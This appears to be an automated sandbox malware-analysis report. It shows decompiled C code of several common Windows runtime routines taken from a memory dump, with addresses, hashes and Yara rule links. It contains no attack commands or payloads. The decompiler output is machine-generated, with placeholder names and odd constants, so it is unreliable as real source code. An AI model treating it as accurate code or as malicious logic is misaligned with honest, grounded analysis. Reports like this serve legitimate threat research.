                                                                                                • Associated: 00000001.00000002.505224906.0000000006F0F000.00000040.00000800.00020000.00000000.sdmpDownload File
                                                                                                Joe Sandbox IDA Plugin
                                                                                                • Snapshot File: hcaresult_1_2_6df0000_colorcpl.jbxd
                                                                                                Similarity
                                                                                                • API ID:
                                                                                                • String ID:
                                                                                                • API String ID:
                                                                                                • Opcode ID: 2bb09fe45805a2d1616792c468915a2c058822ef2e4f539b1de3991886ca989c
                                                                                                • Instruction ID: 82c35e4b62f9b79443a24965f60bc895da951e4ae31f110549efeb1147be2f38
                                                                                                • Opcode Fuzzy Hash: 2bb09fe45805a2d1616792c468915a2c058822ef2e4f539b1de3991886ca989c
                                                                                                • Instruction Fuzzy Hash: 0821D172A00618EFDB40DF58DD81F5AB7BDFB40348F1510A9EA08AB252C371ED05CBA4
                                                                                                Uniqueness

                                                                                                Uniqueness Score: -1.00%

                                                                                                Function 06E96CF0 Relevance: .1, Instructions: 74COMMON
                                                                                                Download Yara Rule
                                                                                                C-Code - Quality: 80%
                                                                                                			E06E96CF0(void* __edx, intOrPtr _a4, short _a8) {
				char _v8;
				char _v12;
				char _v16;
				char _v20;
				char _v28;
				char _v36;
				char _v52;
				void* __ebx;
				void* __edi;
				void* __esi;
				void* __ebp;
				signed char* _t21;
				void* _t24;
				void* _t36;
				void* _t38;
				void* _t46;

				_push(_t36);
				_t46 = __edx;
				_v12 = 0;
				_v8 = 0;
				_v20 = 0;
				_v16 = 0;
				if(E06E37D50() == 0) {
					_t21 = 0x7ffe0384;
				} else {
					_t21 = ( *[fs:0x30])[0x50] + 0x22a;
				}
				if( *_t21 != 0) {
					_t21 =  *[fs:0x30];
					if((_t21[0x240] & 0x00000004) != 0) {
						if(E06E37D50() == 0) {
							_t21 = 0x7ffe0385;
						} else {
							_t21 = ( *[fs:0x30])[0x50] + 0x22b;
						}
						if(( *_t21 & 0x00000020) != 0) {
							_t56 = _t46;
							if(_t46 == 0) {
								_t46 = 0x6df5c80;
							}
							_push(_t46);
							_push( &_v12);
							_t24 = E06E4F6E0(_t36, 0, _t46, _t56);
							_push(_a4);
							_t38 = _t24;
							_push( &_v28);
							_t21 = E06E4F6E0(_t38, 0, _t46, _t56);
							if(_t38 != 0) {
								if(_t21 != 0) {
									E06E97016(_a8, 0, 0, 0,  &_v36,  &_v28);
									L06E32400( &_v52);
								}
								_t21 = L06E32400( &_v28);
							}
						}
					}
				}
				return _t21;
			}



















                                                                                                0x06e96cfb
                                                                                                0x06e96d00
                                                                                                0x06e96d02
                                                                                                0x06e96d06
                                                                                                0x06e96d0a
                                                                                                0x06e96d0e
                                                                                                0x06e96d19
                                                                                                0x06e96d2b
                                                                                                0x06e96d1b
                                                                                                0x06e96d24
                                                                                                0x06e96d24
                                                                                                0x06e96d33
                                                                                                0x06e96d39
                                                                                                0x06e96d46
                                                                                                0x06e96d4f
                                                                                                0x06e96d61
                                                                                                0x06e96d51
                                                                                                0x06e96d5a
                                                                                                0x06e96d5a
                                                                                                0x06e96d69
                                                                                                0x06e96d6b
                                                                                                0x06e96d6d
                                                                                                0x06e96d6f
                                                                                                0x06e96d6f
                                                                                                0x06e96d74
                                                                                                0x06e96d79
                                                                                                0x06e96d7a
                                                                                                0x06e96d7f
                                                                                                0x06e96d82
                                                                                                0x06e96d88
                                                                                                0x06e96d89
                                                                                                0x06e96d90
                                                                                                0x06e96d94
                                                                                                0x06e96da7
                                                                                                0x06e96db1
                                                                                                0x06e96db1
                                                                                                0x06e96dbb
                                                                                                0x06e96dbb
                                                                                                0x06e96d90
                                                                                                0x06e96d69
                                                                                                0x06e96d46
                                                                                                0x06e96dc6

                                                                                                Memory Dump Source
                                                                                                • Source File: 00000001.00000002.500567778.0000000006DF0000.00000040.00000800.00020000.00000000.sdmp, Offset: 06DF0000, based on PE: true
                                                                                                • Associated: 00000001.00000002.505086924.0000000006F0B000.00000040.00000800.00020000.00000000.sdmpDownload File
                                                                                                • Associated: 00000001.00000002.505224906.0000000006F0F000.00000040.00000800.00020000.00000000.sdmpDownload File
                                                                                                Joe Sandbox IDA Plugin
                                                                                                • Snapshot File: hcaresult_1_2_6df0000_colorcpl.jbxd
                                                                                                Similarity
                                                                                                • API ID:
                                                                                                • String ID:
                                                                                                • API String ID:
                                                                                                • Opcode ID: 278b044cbdf58374b69371eb1e261553f5eadcd98b35a7d86e72b61c7b2e75e9
                                                                                                • Instruction ID: d00c8f8a338009ae787e3ef3e25bb71f5f69a15f7dc7bace31cc10b70c14ec97
                                                                                                • Opcode Fuzzy Hash: 278b044cbdf58374b69371eb1e261553f5eadcd98b35a7d86e72b61c7b2e75e9
                                                                                                • Instruction Fuzzy Hash: 4521D3729003449FEB91EF28C944B6BB7ECAF81684F051456F96087350E734C909CAF2
                                                                                                Uniqueness

                                                                                                Uniqueness Score: -1.00%

                                                                                                Function 06EE070D Relevance: .1, Instructions: 72COMMON
                                                                                                Download Yara Rule
                                                                                                C-Code - Quality: 67%
                                                                                                			E06EE070D(signed int* __ecx, signed int __edx, void* __eflags, signed int _a4, signed int _a8) {
				char _v8;
				intOrPtr _v11;
				signed int _v12;
				intOrPtr _v15;
				signed int _v16;
				intOrPtr _v28;
				void* __ebx;
				char* _t32;
				signed int* _t38;
				signed int _t60;

				_t38 = __ecx;
				_v16 = __edx;
				_t60 = E06EE07DF(__ecx, __edx,  &_a4,  &_a8, 2);
				if(_t60 != 0) {
					_t7 = _t38 + 0x38; // 0x29cd5903
					_push( *_t7);
					_t9 = _t38 + 0x34; // 0x6adeeb00
					_push( *_t9);
					_v12 = _a8 << 0xc;
					_t11 = _t38 + 4; // 0x5de58b5b
					_push(0x4000);
					_v8 = (_a4 << 0xc) + (_v16 - ( *__ecx & _v16) >> 4 <<  *_t11) + ( *__ecx & _v16);
					E06EDAFDE( &_v8,  &_v12);
					E06EE1293(_t38, _v28, _t60);
					if(E06E37D50() == 0) {
						_t32 = 0x7ffe0380;
					} else {
						_t32 =  *((intOrPtr*)( *[fs:0x30] + 0x50)) + 0x226;
					}
					if( *_t32 != 0 && ( *( *[fs:0x30] + 0x240) & 0x00000001) != 0) {
						_t21 = _t38 + 0x3c; // 0xc3595e5f
						E06ED14FB(_t38,  *_t21, _v11, _v15, 0xd);
					}
				}
				return  ~_t60;
			}













                                                                                                0x06ee071b
                                                                                                0x06ee0724
                                                                                                0x06ee0734
                                                                                                0x06ee0738
                                                                                                0x06ee074b
                                                                                                0x06ee074b
                                                                                                0x06ee0753
                                                                                                0x06ee0753
                                                                                                0x06ee0759
                                                                                                0x06ee075d
                                                                                                0x06ee0774
                                                                                                0x06ee0779
                                                                                                0x06ee077d
                                                                                                0x06ee0789
                                                                                                0x06ee0795
                                                                                                0x06ee07a7
                                                                                                0x06ee0797
                                                                                                0x06ee07a0
                                                                                                0x06ee07a0
                                                                                                0x06ee07af
                                                                                                0x06ee07c4
                                                                                                0x06ee07cd
                                                                                                0x06ee07cd
                                                                                                0x06ee07af
                                                                                                0x06ee07dc

                                                                                                Memory Dump Source
                                                                                                • Source File: 00000001.00000002.500567778.0000000006DF0000.00000040.00000800.00020000.00000000.sdmp, Offset: 06DF0000, based on PE: true
                                                                                                • Associated: 00000001.00000002.505086924.0000000006F0B000.00000040.00000800.00020000.00000000.sdmpDownload File
                                                                                                • Associated: 00000001.00000002.505224906.0000000006F0F000.00000040.00000800.00020000.00000000.sdmpDownload File
                                                                                                Joe Sandbox IDA Plugin
                                                                                                • Snapshot File: hcaresult_1_2_6df0000_colorcpl.jbxd
                                                                                                Similarity
                                                                                                • API ID:
                                                                                                • String ID:
                                                                                                • API String ID:
                                                                                                • Opcode ID: 16b9495bd7cfc8dc207f06a58ad33f13931981def28ffdf8d69df6cf9eebd83e
                                                                                                • Instruction ID: aefd950653589036cd91572b7ed394eeedeaa50ef40a506de68c0380111107f5
                                                                                                • Opcode Fuzzy Hash: 16b9495bd7cfc8dc207f06a58ad33f13931981def28ffdf8d69df6cf9eebd83e
                                                                                                • Instruction Fuzzy Hash: 482146366043009FD745EF18CC80BAABBA9EFD5310F048569F9948B381DB70D919CB91
                                                                                                Uniqueness

                                                                                                Uniqueness Score: -1.00%

                                                                                                Function 06E3AE73 Relevance: .1, Instructions: 70COMMON
                                                                                                Download Yara Rule
                                                                                                C-Code - Quality: 96%
                                                                                                			E06E3AE73(intOrPtr __ecx, void* __edx) {
				intOrPtr _v8;
				void* _t19;
				char* _t22;
				signed char* _t24;
				intOrPtr _t25;
				intOrPtr _t27;
				void* _t31;
				intOrPtr _t36;
				char* _t38;
				signed char* _t42;

				_push(__ecx);
				_t31 = __edx;
				_v8 = __ecx;
				_t19 = E06E37D50();
				_t38 = 0x7ffe0384;
				if(_t19 != 0) {
					_t22 =  *((intOrPtr*)( *[fs:0x30] + 0x50)) + 0x22a;
				} else {
					_t22 = 0x7ffe0384;
				}
				_t42 = 0x7ffe0385;
				if( *_t22 != 0) {
					if(E06E37D50() == 0) {
						_t24 = 0x7ffe0385;
					} else {
						_t24 =  *((intOrPtr*)( *[fs:0x30] + 0x50)) + 0x22b;
					}
					if(( *_t24 & 0x00000010) != 0) {
						goto L17;
					} else {
						goto L3;
					}
				} else {
					L3:
					_t27 = E06E37D50();
					if(_t27 != 0) {
						_t27 =  *[fs:0x30];
						_t38 =  *((intOrPtr*)(_t27 + 0x50)) + 0x22a;
					}
					if( *_t38 != 0) {
						_t27 =  *[fs:0x30];
						if(( *(_t27 + 0x240) & 0x00000004) == 0) {
							goto L5;
						}
						_t27 = E06E37D50();
						if(_t27 != 0) {
							_t27 =  *[fs:0x30];
							_t42 =  *((intOrPtr*)(_t27 + 0x50)) + 0x22b;
						}
						if(( *_t42 & 0x00000020) != 0) {
							L17:
							_t25 = _v8;
							_t36 = 0;
							if(_t25 != 0) {
								_t36 =  *((intOrPtr*)(_t25 + 0x18));
							}
							_t27 = E06E97794( *((intOrPtr*)(_t31 + 0x18)), _t36,  *((intOrPtr*)(_t31 + 0x94)),  *(_t31 + 0x24) & 0x0000ffff,  *((intOrPtr*)(_t31 + 0x28)));
						}
						goto L5;
					} else {
						L5:
						return _t27;
					}
				}
			}













                                                                                                0x06e3ae78
                                                                                                0x06e3ae7c
                                                                                                0x06e3ae7e
                                                                                                0x06e3ae81
                                                                                                0x06e3ae86
                                                                                                0x06e3ae8d
                                                                                                0x06e82691
                                                                                                0x06e3ae93
                                                                                                0x06e3ae93
                                                                                                0x06e3ae93
                                                                                                0x06e3ae98
                                                                                                0x06e3ae9d
                                                                                                0x06e826a2
                                                                                                0x06e826b4
                                                                                                0x06e826a4
                                                                                                0x06e826ad
                                                                                                0x06e826ad
                                                                                                0x06e826b9
                                                                                                0x00000000
                                                                                                0x06e826bb
                                                                                                0x00000000
                                                                                                0x06e826bb
                                                                                                0x06e3aea3
                                                                                                0x06e3aea3
                                                                                                0x06e3aea3
                                                                                                0x06e3aeaa
                                                                                                0x06e826c0
                                                                                                0x06e826c9
                                                                                                0x06e826c9
                                                                                                0x06e3aeb3
                                                                                                0x06e826d4
                                                                                                0x06e826e1
                                                                                                0x00000000
                                                                                                0x00000000
                                                                                                0x06e826e7
                                                                                                0x06e826ee
                                                                                                0x06e826f0
                                                                                                0x06e826f9
                                                                                                0x06e826f9
                                                                                                0x06e82702
                                                                                                0x06e82708
                                                                                                0x06e82708
                                                                                                0x06e8270b
                                                                                                0x06e8270f
                                                                                                0x06e82711
                                                                                                0x06e82711
                                                                                                0x06e82725
                                                                                                0x06e82725
                                                                                                0x00000000
                                                                                                0x06e3aeb9
                                                                                                0x06e3aeb9
                                                                                                0x06e3aebf
                                                                                                0x06e3aebf
                                                                                                0x06e3aeb3

                                                                                                Memory Dump Source
                                                                                                • Source File: 00000001.00000002.500567778.0000000006DF0000.00000040.00000800.00020000.00000000.sdmp, Offset: 06DF0000, based on PE: true
                                                                                                • Associated: 00000001.00000002.505086924.0000000006F0B000.00000040.00000800.00020000.00000000.sdmpDownload File
                                                                                                • Associated: 00000001.00000002.505224906.0000000006F0F000.00000040.00000800.00020000.00000000.sdmpDownload File
                                                                                                Joe Sandbox IDA Plugin
                                                                                                • Snapshot File: hcaresult_1_2_6df0000_colorcpl.jbxd
                                                                                                Similarity
                                                                                                • API ID:
                                                                                                • String ID:
                                                                                                • API String ID:
                                                                                                • Opcode ID: 892ffc7d7f960dfab719e72e37e7183e7cc58ff0f898e4f283d94cb5f6144d78
                                                                                                • Instruction ID: 38f08b531a99a47c6d14b7d5c6c1ba2b126b364f890f8013be8c6aaba937d036
                                                                                                • Opcode Fuzzy Hash: 892ffc7d7f960dfab719e72e37e7183e7cc58ff0f898e4f283d94cb5f6144d78
                                                                                                • Instruction Fuzzy Hash: 51210471A257948FEBA2AB29C948B2537E8EF00354F0910A1DE0C8B292D735DD80C7E0
                                                                                                Uniqueness

                                                                                                Uniqueness Score: -1.00%

                                                                                                Function 06E97794 Relevance: .1, Instructions: 70COMMON
                                                                                                Download Yara Rule
                                                                                                C-Code - Quality: 82%
                                                                                                			E06E97794(intOrPtr __ecx, intOrPtr __edx, intOrPtr _a4, unsigned int _a8, void* _a12) {
				intOrPtr _v8;
				intOrPtr _v12;
				intOrPtr _t21;
				void* _t24;
				intOrPtr _t25;
				void* _t36;
				short _t39;
				signed char* _t42;
				unsigned int _t46;
				void* _t50;

				_push(__ecx);
				_push(__ecx);
				_t21 =  *0x6f07b9c; // 0x0
				_t46 = _a8;
				_v12 = __edx;
				_v8 = __ecx;
				_t4 = _t46 + 0x2e; // 0x2e
				_t36 = _t4;
				_t24 = L06E34620(__ecx,  *((intOrPtr*)( *[fs:0x30] + 0x18)), _t21 + 0x180000, _t36);
				_t50 = _t24;
				if(_t50 != 0) {
					_t25 = _a4;
					if(_t25 == 5) {
						L3:
						_t39 = 0x14b1;
					} else {
						_t39 = 0x14b0;
						if(_t25 == 6) {
							goto L3;
						}
					}
					 *((short*)(_t50 + 6)) = _t39;
					 *((intOrPtr*)(_t50 + 0x28)) = _t25;
					_t11 = _t50 + 0x2c; // 0x2c
					 *((intOrPtr*)(_t50 + 0x20)) = _v8;
					 *((intOrPtr*)(_t50 + 0x24)) = _v12;
					E06E5F3E0(_t11, _a12, _t46);
					 *((short*)(_t50 + 0x2c + (_t46 >> 1) * 2)) = 0;
					if(E06E37D50() == 0) {
						_t42 = 0x7ffe0384;
					} else {
						_t42 =  *((intOrPtr*)( *[fs:0x30] + 0x50)) + 0x22a;
					}
					_push(_t50);
					_t19 = _t36 - 0x20; // 0xe
					_push(0x403);
					_push( *_t42 & 0x000000ff);
					E06E59AE0();
					_t24 = L06E377F0( *((intOrPtr*)( *[fs:0x30] + 0x18)), 0, _t50);
				}
				return _t24;
			}













                                                                                                0x06e97799
                                                                                                0x06e9779a
                                                                                                0x06e9779b
                                                                                                0x06e977a3
                                                                                                0x06e977ab
                                                                                                0x06e977ae
                                                                                                0x06e977b1
                                                                                                0x06e977b1
                                                                                                0x06e977bf
                                                                                                0x06e977c4
                                                                                                0x06e977c8
                                                                                                0x06e977ce
                                                                                                0x06e977d4
                                                                                                0x06e977e0
                                                                                                0x06e977e0
                                                                                                0x06e977d6
                                                                                                0x06e977d6
                                                                                                0x06e977de
                                                                                                0x00000000
                                                                                                0x00000000
                                                                                                0x06e977de
                                                                                                0x06e977e5
                                                                                                0x06e977f0
                                                                                                0x06e977f3
                                                                                                0x06e977f6
                                                                                                0x06e977fd
                                                                                                0x06e97800
                                                                                                0x06e9780c
                                                                                                0x06e97818
                                                                                                0x06e9782b
                                                                                                0x06e9781a
                                                                                                0x06e97823
                                                                                                0x06e97823
                                                                                                0x06e97830
                                                                                                0x06e97831
                                                                                                0x06e97838
                                                                                                0x06e9783d
                                                                                                0x06e9783e
                                                                                                0x06e9784f
                                                                                                0x06e9784f
                                                                                                0x06e9785a

                                                                                                Memory Dump Source
                                                                                                • Source File: 00000001.00000002.500567778.0000000006DF0000.00000040.00000800.00020000.00000000.sdmp, Offset: 06DF0000, based on PE: true
                                                                                                • Associated: 00000001.00000002.505086924.0000000006F0B000.00000040.00000800.00020000.00000000.sdmpDownload File
                                                                                                • Associated: 00000001.00000002.505224906.0000000006F0F000.00000040.00000800.00020000.00000000.sdmpDownload File
                                                                                                Joe Sandbox IDA Plugin
                                                                                                • Snapshot File: hcaresult_1_2_6df0000_colorcpl.jbxd
                                                                                                Similarity
                                                                                                • API ID:
                                                                                                • String ID:
                                                                                                • API String ID:
                                                                                                • Opcode ID: d43ce82633dab9a6c2fdc72e9fa96061a60cd4bc519664e46eceed4084d6b72d
                                                                                                • Instruction ID: 6fea93e7cca3e187b4a20f20e533b3f65a9d97b4447a9994e5965124e2dd6c0c
                                                                                                • Opcode Fuzzy Hash: d43ce82633dab9a6c2fdc72e9fa96061a60cd4bc519664e46eceed4084d6b72d
                                                                                                • Instruction Fuzzy Hash: EE21CF72910714ABCB65DF69DC84EABB7ACEF48340F100169E90AC7690D634E900CBA4
                                                                                                Uniqueness

                                                                                                Uniqueness Score: -1.00%

                                                                                                Function 06E4FD9B Relevance: .1, Instructions: 69COMMON
                                                                                                Download Yara Rule
                                                                                                C-Code - Quality: 93%
                                                                                                			E06E4FD9B(intOrPtr __ecx, intOrPtr __edx, intOrPtr _a4) {
				intOrPtr _v8;
				void* _t19;
				intOrPtr _t29;
				intOrPtr _t32;
				intOrPtr _t35;
				intOrPtr _t37;
				intOrPtr* _t40;

				_t35 = __edx;
				_push(__ecx);
				_push(__ecx);
				_t37 = 0;
				_v8 = __edx;
				_t29 = __ecx;
				if( *((intOrPtr*)( *[fs:0x18] + 0xfbc)) != 0) {
					_t40 =  *((intOrPtr*)( *[fs:0x18] + 0xfbc));
					L3:
					_t19 = _a4 - 4;
					if(_t19 != 0) {
						if(_t19 != 1) {
							L7:
							return _t37;
						}
						if(_t35 == 0) {
							L11:
							_t37 = 0xc000000d;
							goto L7;
						}
						if( *((intOrPtr*)(_t40 + 4)) != _t37) {
							L06E377F0( *((intOrPtr*)( *[fs:0x30] + 0x18)), _t37,  *((intOrPtr*)(_t40 + 4)));
							_t35 = _v8;
						}
						 *((intOrPtr*)(_t40 + 4)) = _t35;
						goto L7;
					}
					if(_t29 == 0) {
						goto L11;
					}
					_t32 =  *_t40;
					if(_t32 != 0) {
						 *((intOrPtr*)(_t29 + 0x20)) =  *((intOrPtr*)(_t32 + 0x20));
						E06E276E2( *_t40);
					}
					 *_t40 = _t29;
					goto L7;
				}
				_t40 = L06E34620(__ecx,  *((intOrPtr*)( *[fs:0x30] + 0x18)), 8, 8);
				if(_t40 == 0) {
					_t37 = 0xc0000017;
					goto L7;
				}
				_t35 = _v8;
				 *_t40 = 0;
				 *((intOrPtr*)(_t40 + 4)) = 0;
				 *((intOrPtr*)( *[fs:0x18] + 0xfbc)) = _t40;
				goto L3;
			}










                                                                                                0x06e4fd9b
                                                                                                0x06e4fda0
                                                                                                0x06e4fda1
                                                                                                0x06e4fdab
                                                                                                0x06e4fdad
                                                                                                0x06e4fdb0
                                                                                                0x06e4fdb8
                                                                                                0x06e4fe0f
                                                                                                0x06e4fde6
                                                                                                0x06e4fde9
                                                                                                0x06e4fdec
                                                                                                0x06e8c0c0
                                                                                                0x06e4fdfe
                                                                                                0x06e4fe06
                                                                                                0x06e4fe06
                                                                                                0x06e8c0c8
                                                                                                0x06e4fe2d
                                                                                                0x06e4fe2d
                                                                                                0x00000000
                                                                                                0x06e4fe2d
                                                                                                0x06e8c0d1
                                                                                                0x06e8c0e0
                                                                                                0x06e8c0e5
                                                                                                0x06e8c0e5
                                                                                                0x06e8c0e8
                                                                                                0x00000000
                                                                                                0x06e8c0e8
                                                                                                0x06e4fdf4
                                                                                                0x00000000
                                                                                                0x00000000
                                                                                                0x06e4fdf6
                                                                                                0x06e4fdfa
                                                                                                0x06e4fe1a
                                                                                                0x06e4fe1f
                                                                                                0x06e4fe1f
                                                                                                0x06e4fdfc
                                                                                                0x00000000
                                                                                                0x06e4fdfc
                                                                                                0x06e4fdcc
                                                                                                0x06e4fdd0
                                                                                                0x06e4fe26
                                                                                                0x00000000
                                                                                                0x06e4fe26
                                                                                                0x06e4fdd8
                                                                                                0x06e4fddb
                                                                                                0x06e4fddd
                                                                                                0x06e4fde0
                                                                                                0x00000000

                                                                                                Memory Dump Source
                                                                                                • Source File: 00000001.00000002.500567778.0000000006DF0000.00000040.00000800.00020000.00000000.sdmp, Offset: 06DF0000, based on PE: true
                                                                                                • Associated: 00000001.00000002.505086924.0000000006F0B000.00000040.00000800.00020000.00000000.sdmpDownload File
                                                                                                • Associated: 00000001.00000002.505224906.0000000006F0F000.00000040.00000800.00020000.00000000.sdmpDownload File
                                                                                                Joe Sandbox IDA Plugin
                                                                                                • Snapshot File: hcaresult_1_2_6df0000_colorcpl.jbxd
                                                                                                Similarity
                                                                                                • API ID:
                                                                                                • String ID:
                                                                                                • API String ID:
                                                                                                • Opcode ID: bea69b06ccd41e2ab95b3552422c6337f6d423ba3d9b45e75fab26429da45353
                                                                                                • Instruction ID: 63f5ae9b6a20de28c488d63163b051f3a30d10c39c21c1327b76919bce5ade12
                                                                                                • Opcode Fuzzy Hash: bea69b06ccd41e2ab95b3552422c6337f6d423ba3d9b45e75fab26429da45353
                                                                                                • Instruction Fuzzy Hash: 1E217972A00B44DFD7B1EF19E680E66B7E5EBD4E15F25916EE94987A10D730AC00CF90
                                                                                                Uniqueness

                                                                                                Uniqueness Score: -1.00%

                                                                                                Function 06E19240 Relevance: .1, Instructions: 63COMMON
                                                                                                Download Yara Rule
                                                                                                C-Code - Quality: 77%
                                                                                                			E06E19240(void* __ebx, intOrPtr __ecx, void* __edi, void* __esi, void* __eflags) {
				intOrPtr _t33;
				intOrPtr _t37;
				intOrPtr _t41;
				intOrPtr* _t46;
				void* _t48;
				intOrPtr _t50;
				intOrPtr* _t60;
				void* _t61;
				intOrPtr _t62;
				intOrPtr _t65;
				void* _t66;
				void* _t68;

				_push(0xc);
				_push(0x6eef708);
				E06E6D08C(__ebx, __edi, __esi);
				_t65 = __ecx;
				 *((intOrPtr*)(_t68 - 0x1c)) = __ecx;
				if( *(__ecx + 0x24) != 0) {
					_push( *(__ecx + 0x24));
					E06E595D0();
					 *(__ecx + 0x24) =  *(__ecx + 0x24) & 0x00000000;
				}
				L6();
				L6();
				_push( *((intOrPtr*)(_t65 + 0x28)));
				E06E595D0();
				_t33 =  *0x6f084c4; // 0x0
				L06E377F0( *((intOrPtr*)( *[fs:0x30] + 0x18)), _t33 + 0xc0000,  *((intOrPtr*)(_t65 + 0x10)));
				_t37 =  *0x6f084c4; // 0x0
				L06E377F0( *((intOrPtr*)( *[fs:0x30] + 0x18)), _t37 + 0xc0000,  *((intOrPtr*)(_t65 + 0x1c)));
				_t41 =  *0x6f084c4; // 0x0
				E06E32280(L06E377F0( *((intOrPtr*)( *[fs:0x30] + 0x18)), _t41 + 0xc0000,  *((intOrPtr*)(_t65 + 0x20))), 0x6f086b4);
				 *(_t68 - 4) =  *(_t68 - 4) & 0x00000000;
				_t46 = _t65 + 0xe8;
				_t62 =  *_t46;
				_t60 =  *((intOrPtr*)(_t46 + 4));
				if( *((intOrPtr*)(_t62 + 4)) != _t46 ||  *_t60 != _t46) {
					_t61 = 3;
					asm("int 0x29");
					_push(_t65);
					_t66 = _t61;
					_t23 = _t66 + 0x14; // 0x8df8084c
					_push( *_t23);
					E06E595D0();
					_t24 = _t66 + 0x10; // 0x89e04d8b
					_push( *_t24);
					 *(_t66 + 0x38) =  *(_t66 + 0x38) & 0x00000000;
					_t48 = E06E595D0();
					 *(_t66 + 0x14) =  *(_t66 + 0x14) & 0x00000000;
					 *(_t66 + 0x10) =  *(_t66 + 0x10) & 0x00000000;
					return _t48;
				} else {
					 *_t60 = _t62;
					 *((intOrPtr*)(_t62 + 4)) = _t60;
					 *(_t68 - 4) = 0xfffffffe;
					E06E19325();
					_t50 =  *0x6f084c4; // 0x0
					return E06E6D0D1(L06E377F0( *((intOrPtr*)( *[fs:0x30] + 0x18)), _t50 + 0xc0000, _t65));
				}
			}















                                                                                                0x06e19240
                                                                                                0x06e19242
                                                                                                0x06e19247
                                                                                                0x06e1924c
                                                                                                0x06e1924e
                                                                                                0x06e19255
                                                                                                0x06e19257
                                                                                                0x06e1925a
                                                                                                0x06e1925f
                                                                                                0x06e1925f
                                                                                                0x06e19266
                                                                                                0x06e19271
                                                                                                0x06e19276
                                                                                                0x06e19279
                                                                                                0x06e1927e
                                                                                                0x06e19295
                                                                                                0x06e1929a
                                                                                                0x06e192b1
                                                                                                0x06e192b6
                                                                                                0x06e192d7
                                                                                                0x06e192dc
                                                                                                0x06e192e0
                                                                                                0x06e192e6
                                                                                                0x06e192e8
                                                                                                0x06e192ee
                                                                                                0x06e19332
                                                                                                0x06e19333
                                                                                                0x06e19337
                                                                                                0x06e19338
                                                                                                0x06e1933a
                                                                                                0x06e1933a
                                                                                                0x06e1933d
                                                                                                0x06e19342
                                                                                                0x06e19342
                                                                                                0x06e19345
                                                                                                0x06e19349
                                                                                                0x06e1934e
                                                                                                0x06e19352
                                                                                                0x06e19357
                                                                                                0x06e192f4
                                                                                                0x06e192f4
                                                                                                0x06e192f6
                                                                                                0x06e192f9
                                                                                                0x06e19300
                                                                                                0x06e19306
                                                                                                0x06e19324
                                                                                                0x06e19324

                                                                                                Memory Dump Source
                                                                                                • Source File: 00000001.00000002.500567778.0000000006DF0000.00000040.00000800.00020000.00000000.sdmp, Offset: 06DF0000, based on PE: true
                                                                                                • Associated: 00000001.00000002.505086924.0000000006F0B000.00000040.00000800.00020000.00000000.sdmpDownload File
                                                                                                • Associated: 00000001.00000002.505224906.0000000006F0F000.00000040.00000800.00020000.00000000.sdmpDownload File
                                                                                                Joe Sandbox IDA Plugin
                                                                                                • Snapshot File: hcaresult_1_2_6df0000_colorcpl.jbxd
                                                                                                Similarity
                                                                                                • API ID: InitializeThunk
                                                                                                • String ID:
                                                                                                • API String ID: 2994545307-0
                                                                                                • Opcode ID: 317e69c61368d5e8e8eef5b07c1761ac07ce9e293ebfca5c9d2d7b4f8e855600
                                                                                                • Instruction ID: c74a92dfaa3fb6ca56f6cb8c7fb6d5204e41e35ca5ecad0a83b45a3d13ad53db
                                                                                                • Opcode Fuzzy Hash: 317e69c61368d5e8e8eef5b07c1761ac07ce9e293ebfca5c9d2d7b4f8e855600
                                                                                                • Instruction Fuzzy Hash: EF213671150700EFCBE1EF28CE14B59B7BDFF08704F455568A1698B6A2CB34EA51DB48
                                                                                                Uniqueness

                                                                                                Uniqueness Score: -1.00%

                                                                                                Function 06E4B390 Relevance: .1, Instructions: 63COMMON
                                                                                                Download Yara Rule
                                                                                                C-Code - Quality: 54%
                                                                                                			E06E4B390(void* __ecx, intOrPtr _a4) {
				signed int _v8;
				signed char _t12;
				signed int _t16;
				signed int _t21;
				void* _t28;
				signed int _t30;
				signed int _t36;
				signed int _t41;

				_push(__ecx);
				_t41 = _a4 + 0xffffffb8;
				E06E32280(_t12, 0x6f08608);
				 *(_t41 + 0x34) =  *(_t41 + 0x34) - 1;
				asm("sbb edi, edi");
				_t36 =  !( ~( *(_t41 + 0x34))) & _t41;
				_v8 = _t36;
				asm("lock cmpxchg [ebx], ecx");
				_t30 = 1;
				if(1 != 1) {
					while(1) {
						_t21 = _t30 & 0x00000006;
						_t16 = _t30;
						_t28 = (0 | _t21 == 0x00000002) * 4 - 1 + _t30;
						asm("lock cmpxchg [edi], esi");
						if(_t16 == _t30) {
							break;
						}
						_t30 = _t16;
					}
					_t36 = _v8;
					if(_t21 == 2) {
						_t16 = E06E500C2(0x6f08608, 0, _t28);
					}
				}
				if(_t36 != 0) {
					_t16 = L06E377F0( *((intOrPtr*)( *[fs:0x30] + 0x18)), 0, _t36);
				}
				return _t16;
			}











                                                                                                0x06e4b395
                                                                                                0x06e4b3a2
                                                                                                0x06e4b3a5
                                                                                                0x06e4b3aa
                                                                                                0x06e4b3b2
                                                                                                0x06e4b3ba
                                                                                                0x06e4b3bd
                                                                                                0x06e4b3c0
                                                                                                0x06e4b3c4
                                                                                                0x06e4b3c9
                                                                                                0x06e8a3e9
                                                                                                0x06e8a3ed
                                                                                                0x06e8a3f0
                                                                                                0x06e8a3ff
                                                                                                0x06e8a403
                                                                                                0x06e8a409
                                                                                                0x00000000
                                                                                                0x00000000
                                                                                                0x06e8a40b
                                                                                                0x06e8a40b
                                                                                                0x06e8a40f
                                                                                                0x06e8a415
                                                                                                0x06e8a423
                                                                                                0x06e8a423
                                                                                                0x06e8a415
                                                                                                0x06e4b3d1
                                                                                                0x06e4b3e8
                                                                                                0x06e4b3e8
                                                                                                0x06e4b3d9

                                                                                                Memory Dump Source
                                                                                                • Source File: 00000001.00000002.500567778.0000000006DF0000.00000040.00000800.00020000.00000000.sdmp, Offset: 06DF0000, based on PE: true
                                                                                                • Associated: 00000001.00000002.505086924.0000000006F0B000.00000040.00000800.00020000.00000000.sdmpDownload File
                                                                                                • Associated: 00000001.00000002.505224906.0000000006F0F000.00000040.00000800.00020000.00000000.sdmpDownload File
                                                                                                Joe Sandbox IDA Plugin
                                                                                                • Snapshot File: hcaresult_1_2_6df0000_colorcpl.jbxd
                                                                                                Similarity
                                                                                                • API ID:
                                                                                                • String ID:
                                                                                                • API String ID:
                                                                                                • Opcode ID: 0b929f40a6eab7dce4896789238604589b21db5c9764ee54a0ab0a973510de9c
                                                                                                • Instruction ID: ff1c4b2d825b23d0ed471f738a32f968774b5ea5cb53b7e86c38b8f0bdcb6ef5
                                                                                                • Opcode Fuzzy Hash: 0b929f40a6eab7dce4896789238604589b21db5c9764ee54a0ab0a973510de9c
                                                                                                • Instruction Fuzzy Hash: A7116F337213105FCF98AA659D4566B735AEBC5770B252139ED2BC73C0D9719C02C6D4
